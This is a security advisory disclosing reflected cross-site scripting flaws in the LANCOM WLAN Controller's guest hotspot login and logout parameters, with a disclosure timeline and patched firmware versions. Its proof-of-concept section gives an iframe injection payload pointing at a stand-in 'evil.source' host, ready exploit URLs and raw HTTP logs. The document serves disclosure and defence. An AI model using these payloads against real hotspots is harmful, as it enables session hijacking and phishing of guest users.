Document Title:
===============
LANCOM WLAN Controller - Multiple Cross Site Scripting Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2196

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2020/04/30/vulnerability-lancom-systems-wireless-controller-series-uncovered


Release Date:
=============
2020-05-07


Vulnerability Laboratory ID (VL-ID):
====================================
2196


Common Vulnerability Scoring System:
====================================
4.7


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Die LANCOM Public Spot Option ermöglicht die Bereitstellung eines
zuverlässigen und sicheren Zugangs für Gäste, Besucher,
Partner oder Kunden über nur eine Infrastruktur. Dabei bleiben Haus- und
Gastnetz stets sicher voneinander getrennt.
Ohne das Netzwerk um zusätzliche Hardware-Komponenten zu erweitern,
erhalten Sie mit der LANCOM Public Spot Option
die optimale Lösung für die Einrichtung sicherer Hotspots.

(Copy of the Homepage:
https://www.lancom-systems.de/produkte/software-optionen/lancom-public-spot/
)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
non-persistent cross site scripting vulnerabilities in
the official LANCOM Systems WLAN Controller WLC (400 & 1000) Series with
LCOS 10.x.


Affected Product(s):
====================
LANCOM Systems
Product: WLAN Controller WLC-1000 & WLC-4006 ...
Firmware: LCOS 10.12 SU14, 10.20 SU9 & 10.32 RU8


Vulnerability Disclosure Timeline:
==================================
2020-03-20: Researcher Notification & Coordination (Security Researcher)
2020-04-14: Vendor Notification (Security Department)
2020-04-15: Vendor Response/Feedback (Security Department)
2020-04-20: Vendor Fix/Patch (Service Developer Team)
2020-05-07: Security Acknowledgements (Security Department)
2020-05-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple cross site scripting web vulnerabilities has been discovered in
the official LANCOM Systems WLAN Controller WLC (400 & 1000) Series with
LCOS 10.x.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise
browser to web-application requests from the client-side. The product is
publicly certified by the BSI in germany and owns a
security policy against backdoors.

The cross site scripting vulnerabilities are located in the `userid` and
`password` parameters of the  `/authen/start/` (login/logout) module.
Unauthenticated attackers can connect to the guest wifi (ibd gast) with
the web ui logon mask to inject own malicious non-persistent script
codes for client-side manipulations into the login and password input
fields. The execution can as well be triggered with a simple logout GET
method request via refresh parameter. The request method to inject the
malicious script code is POST and the attack vector of the vulnerability
is non-persistent on client-side.

Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack vector of
the vulnerability is non-persistent and the request method to
inject/execute is POST/GET. The vulnerabilities are classic client-side
cross
site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, non-persistent phishing
attacks,
non-persistent external redirects to malicious source and non-persistent
manipulation of affected or connected application modules.

Request Method(s):
[+] POST / GET

Vulnerable Module(s):
[+] /authen/start/
[+] /logout/

Function(s):
[+] refresh

Vulnerable Parameter(s):
[+] Userid
[+] Password


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers with guest
authentication and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Start your local webbrowser
2. Tamper the http session protocol
2. Start a Wifi Scan
2. Identify the public guest hotspot of lancom
3. Connect to it with guest permissions without credentials
4. Interact by openening the web ui on login.com were you can connect
with the correct wifi access credentials
5. Inject the payload in the userid and password input fields of the
wifi hotspot login form and submit via post method
6. The injected script code directly executes near to the input field
were the content is insecure transmitted
7. Successful reproduce of the cross site scripting web vulnerability!


PoC: Payload
test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>


PoC: Exploitation
http://www.login.com/authen/start/?refreshhost=192.168.20.13737&refreshssl=0&refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
http://logout/authen/start/?refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>


Vulnerable Source:
<div id="contentDiv">
<h2>Login</h2>
<form method="POST" name="myForm" action="http://logout:80/authen/login/">
<div><input type="hidden" name="refreshdir" value=""></div>
<div><input type="hidden" name="refreshhost" value="192.168.20.137"></div>
<div><input type="hidden" name="refreshssl" value="0"></div>
<input style="color:#000000" id="userid" name="userid" type="text"
size="24" maxlength="64" value="a"><iframe src="[evil.source]/"></iframe>"
onfocus="if(this.value && this.value == this.defaultValue) {
this.value=''; if(document.all) {this.createTextRange().select(); }
this.style.color='#000000'; }" onblur="if(this.value == '') {
this.value='a""><iframe src="[evil.source]/"></iframe>';
this.style.color='#000000'; }"/><br>
<input id="password" name="password" type="text" size="24"
maxlength="64" value="Your password" onfocus="if(this.value &&
this.value == this.defaultValue) { this.value=''; if(document.all)
{this.createTextRange().select(); }
document.getElementById('showPassword').checked ?
this.type='text' : this.type='password'; this.style.color='#000000'; }"
onblur="if(this.value == '') { this.value='Your password';
this.type='text'; this.style.color='#ccc'; }">
<div style="padding-bottom:0px;">
<input id="showPassword" name="showPassword" type="checkbox"
onchange="if(document.getElementById('password').value &&
document.getElementById('password').value
!= document.getElementById('password').defaultValue) { this.checked ?
document.getElementById('password').type='text' :
document.getElementById('password').type='password' }"><span
id="showPasswordText">Show password</span>
</div>


--- [PoC Session Logs] --- (Login)
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=0&refreshuser=test"><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Connection: Keep-Alive
Server: LANCOM
Cache-Control: max-age=3600, must-revalidate
Content-Type: image/svg+xml
Content-Length: 9362
http://www.login.com/authen/start/evil.source -PWND
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Connection: Keep-Alive
Server: LANCOM
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 31 Dec 1999 00:00:00 GMT
Content-Type: text/html
Content-Security-Policy: default-src 'self' 'unsafe-inline'; script-src
'self' 'unsafe-inline' 'unsafe-eval'; connect-src *
Referrer-Policy: no-referrer
Feature-Policy: geolocation 'none'; midi 'none'; notifications 'none';
push 'none'; sync-xhr 'none'; microphone 'none';
camera 'none'; magnetometer 'none'; gyroscope 'none'; speaker 'none';
vibrate 'none'; fullscreen 'self'; payment 'none'
Content-Encoding: gzip
http://www.login.com/authen/start/evil.source -PWND
Host: www.login.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Server: LANCOM


--- [PoC Session Logs] (POST) --- (Logout)
http://logout/authen/login/
Host: logout
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: null
Connection: keep-alive
Upgrade-Insecure-Requests: 1
refreshdir=&userid=test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>&password=test">><iframe+src%3Devil.source+onload%3Dalert("PWND")><%2Fiframe>
-
POST: HTTP/1.1 200 OK
Connection: Close
Server: LANCOM
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 31 Dec 1999 00:00:00 GMT
Content-Type: text/html
Referrer-Policy: no-referrer
Feature-Policy: geolocation 'none'; midi 'none'; notifications 'none';
push 'none'; sync-xhr 'none'; microphone 'none'; camera 'none';
magnetometer
'none'; gyroscope 'none'; speaker 'none'; vibrate 'none'; fullscreen
'self'; payment 'none'
Content-Encoding: gzip


Reference(s):
http://logout/
http://logout/authen/
http://logout/authen/login/
http://www.login.com/
http://www.login.com/images/
http://www.login.com/authen/
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=
http://www.login.com/authen/start/?refreshhost=192.168.20.137&refreshssl=0&refreshuser=


Solution - Fix & Patch:
=======================
The vulnerability can be patched by following the steps ...
1. Parse the content of the username and password input field to prevent
the injection point
2. Restrict the input field by disallowing the usage of specific special
chars for the name and password variables
3. Secure the output location were the content is insecure sanitized
delivered as output result


Solution of Manufacturer:
https://www.lancom-systems.de/service-support/soforthilfe/allgemeine-sicherheitshinweise/
https://www.lancom-systems.com/service-support/instant-help/general-security-information/

The vulnerabilities are resolved in the following versions ... LCOS
10.12 SU15, 10.20 SU10 & 10.32 RU9.
We recommend all product customers to update the lcos as soon as
possible to prevent attacks by criminals.


Security Risk:
==============
The security risk of the non-persistent cross site scripting
vulnerability in the login form of the wifi hotspot application is
estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com